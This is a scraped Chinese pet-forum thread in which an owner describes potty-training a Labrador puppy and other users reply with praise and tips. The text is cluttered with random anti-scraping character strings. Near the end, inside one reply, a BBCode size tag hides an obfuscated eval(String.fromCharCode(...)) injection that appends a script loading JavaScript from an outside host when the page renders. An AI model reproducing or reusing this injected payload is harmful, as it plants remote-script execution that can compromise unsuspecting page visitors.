设为首页收藏本站

狗民网

[知识分享] 我家拉拉的点滴(上厕所)

goumin28gqkz

中级狗民

狗民币:70

自从把我家土豆接回家以后就给自己补各种养狗方面的知识。首先面临的一个巨大的挑战就是该如何教自己的狗狗上厕所,我查看了下各位大神狗友的帖子,细细的琢磨着应该如何教它上厕所,对于我这种小白来说挺难的,然后我就开始了对土豆的上厕所训练。可能是我特别着急,它吃完饭我就带它去厕所,然后把它之前擦尿液的纸放到给它买的厕所的垫子上对它说上厕所在这里上知道不,然后一脸呆萌的看着我,好像再说:你说啥?由于刚吃完饭,我就一直等着它拉尿,我那个等待真的是如此漫长,它就趴在那一动不动,就这样半个小时过去了,任何的反应都没有,真的是好气啊!然后我就带着它出了厕所门,惊奇的事情发生了,我一个没注意在客厅尿了,真的是很无奈,接二连三的都是这样,打也打了,骂也骂了,然后就是一脸呆萌的看着我,一点脾气我都没有。后来想了一下,是不是自己哪里做的不对了,问题出在哪?都说狗狗吃完饭十五到半个小时会进行小便和大便,看它在地上嗅就是找地方拉尿,我觉得应该是刚买回来,饮食上还没有形成规律。接着我就调整了一下它的饮食时间,果然真的是见效了。调整完饮食的第三天,它吃完饭我就和它完十分钟,然后就带着它去厕所,我就坐在马桶上用小棍子翘它的狗厕所说:上厕所。之前反复告诉它在这里拉尿,狗厕所垫子下面有它的粑粑和尿。奇迹出现了,先是自己上去尿,我给它奖励了两颗零食,摸摸它的头说:土豆你做的真棒,非常好。我又等了五分钟,主动去狗厕所拉粑粑了,也给了同样的奖励。这样已经持续一个星期了,现在能自己去厕所了,真的非常的欣慰。现在由于我和老婆都上班,中午才能回来,早晨吃完饭只能把他关笼子里,它控制不住会拉尿在笼子里,毕竟还小,三个多月了。上周它在狗笼子里上午拉尿了三次,回去的时候我还很惊奇为什么没有拉尿,我放出来直接奔厕所拉尿挺多,憋了一上午,憋不住的时候会直接在笼子里解决。附上我家土豆的照片。' i1 L7 l* d3 ^8 I1 e: q2 M
. [! O  ~0 v" K2 `6 F
9 j9 w- t, B5 ^  j+ U/ U
- k8 v/ t  m/ e8 F% k) I
" s3 x( \4 ?8 U. C$ j' o

! S, e. Q2 `# x* J2 `. h1 a

4 U6 m% ]. A" k; _. W7 R- }/ M
7 X& M. O4 z) b3 @" G  M
) ?/ N4 w0 e2 n) }9 Z0 \! c# w( l& ]* v+ W
- A) b8 M1 [$ {' }* @

" a# m1 D2 O/ Q/ }! Y0 u+ _- J9 ~4 u9 j5 B& o. _# o# q$ l" {

" C% k, v' K5 O+ f) c# c

+ V' c7 R: h$ }! e, A! M8 K+ J( G4 a+ o) p3 t
( Z3 u' H# R  h9 R9 `9 @" T

3 J; z" S4 T, i3 }0 f: s" R# g( {

0 N4 Y/ W! ]' o+ r9 `% I9 R2 Z/ m7 C

1 D  w& F# v: [+ {0 e7 H' j7 U5 f  A* Y: F/ j) o9 b
+ I8 J8 }  d9 C; o# D+ a: j: P- @
* X0 p3 `& N/ C# B; {% G

/ t- K1 S/ a, _7 w& q4 ]7 s/ y3 Y+ r9 Y* t; N4 }" G
$ d- P7 Y+ z2 N. A9 ~1 w# E

- h5 Z' s- Z, j# Z; ~% ?0 K  C4 s( a5 D

% A) E2 R/ B  e( M

( L6 T: Y: |% B1 Z, T% U, n, V- W( d6 m% p9 u  |- T) y

已有 1 人评分积分 狗民币 收起 理由
Christina0410 + 30 + 50 恭喜上首页

总评分: 积分 + 30  狗民币 + 50   查看全部评分

hanniuniu

金牌狗民

就是爱它

狗民币:419

金牌狗民勋章

catmm

禁止发言

狗民币:33

聪明的宝宝,学的真快

mySUNNY

金牌狗民

狗民币:52

金牌狗民勋章

哈哈 来看看

ainimo

狗民元老

爱尼莫

狗民币:564

狗民元老勋章

好棒的土豆

dududemamaququ

高级狗民

狗民币:1898

狗民币:37740

白银元老勋章 初级宅星勋章 高级水手 财富勋章

u4 z+ C$ c3 L/ I; U' ]/ ^; P/ ]% _: e* ~! j& u& v
谢谢楼主的分享~7 }% a( c+ E1 \8 R+ s

5 Y  ~2 A: c! v拉拉长得很快,可能一个月后定点刚练成,这个狗厕所就用不了了,如果狗狗觉得厕所太小不方便,也可能会把已经练好的定点给崩了。而重新买个狗厕所又需要重新强化训练定点,所以建议一开始就买个大小适合的狗厕所可以一直用下去。4 c: J, B1 ~6 Z+ s2 V* o$ A

& h. I1 s" e2 y* }狗狗吃完饭十五到半个小时会进行小便和大便” 这话其实不太科学,百度网文就是这点不好,部分可能缺乏依据。狗狗消化食物的速度不一样,对于没有泡的干狗粮,消化到促进肠胃蠕动从而排出上一顿便便的时间不一样,有的半小时,有的两小时就是合理的,所以主人们还是需要耐心,观察出来自己狗狗的规律~~这点楼主在随后改进方法,很赞~

gm_PuRihRXbbOsv

中级狗民

狗民币:12

好棒棒喔!

gm_PuRihRXbbOsv

中级狗民

狗民币:12

我等很久宝贝还不尿尿便便,我就去做别的事情,等我过来看,竟然是这样………

咖喱咖喱  这个就厉害了,有一次我家旺在笼子里拉粑粑了,躺在粑粑上睡了,我回来之后瞬间我就炸了。你应该盯着它,把握好它的拉尿时间就不会这样了,好好和它沟通,做对了就给奖励,错了就训他  发表于 17/6/11 18:03 回复点评
咖喱咖喱  把握好它的拉尿时间,结合它吃完饭和喝完水之后,它在地上来回嗅就说明它要拉尿了,然后你带它去,把有它尿的纸垫在下面,告诉它上厕所,多训练就好了,坚持下去,做对了给它奖励  发表于 17/6/11 18:06 回复点评
手机(156****9400)  谢谢你,我再试试看  发表于 17/6/11 23:23 回复点评

gm_ImXSW2QyrsH6

初级狗民

狗民币:59

% e' e' v2 f  q- V) u( @一看就是好乖的宝宝& S- x; O" F9 e9 Y6 g
' R5 s+ f7 A3 P8 ^
( L- v4 T, g' n) r8 G1 C6 J% N0 Y
' r! k+ h+ @5 H0 P

: ^: m* J/ w8 Q6 _% _6 u
2 K* W2 ]3 Z6 S0 H' Y% V0 u+ f! ^) H2 O. ^& u+ l" W" \

5 ]* j4 _! k; i+ r* k8 {. {0 t( [* E6 D
) G, s0 P/ O4 S- ~8 ~1 l& N
( Q& _. y( h! @/ }7 C0 @" x- X* U
8 m8 N) s4 F7 _
[size=filesize ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+' Bytes)]

gm_114F6nYM1F4W

青铜元老

狗民币:506

青铜元老勋章

gm_0H71sB7QEU4e

金牌狗民

狗民币:52

金牌狗民勋章

gm_AqzuAhpa3nPm

狗民元老

狗民币:46

狗民元老勋章

gm_v4VSVgQGeymX

金牌狗民

狗民币:98

金牌狗民勋章

聪明宝宝,不过小狗狗还是别憋太久。

baobao13

高级狗民

狗民币:82

catmm

禁止发言

狗民币:33

聪明的宝贝

goumin4l766

初级狗民

狗民币:0

我家的有时候在狗厕所便便,有时候在客厅,请教版主这种情况怎么办呢

咖喱咖喱  直接训它,让它知道这样做你不喜欢它,循环几次就会好很多,在狗厕所上厕所给予奖励,在客厅就要训它  发表于 17/6/12 14:04 回复点评

gm_CZUzKLNqAePr

初级狗民

狗民币:116

聪明的宝宝

gm_Lffqnvh2fbHq

初级狗民

狗民币:0

我家嘟嘟也是从小养成定点的习惯,现在大了就每次上完厕所后都有傲娇的讨零食

gm_E397FQQPhE8t

中级狗民

狗民币:7

厕所小了,土豆好棒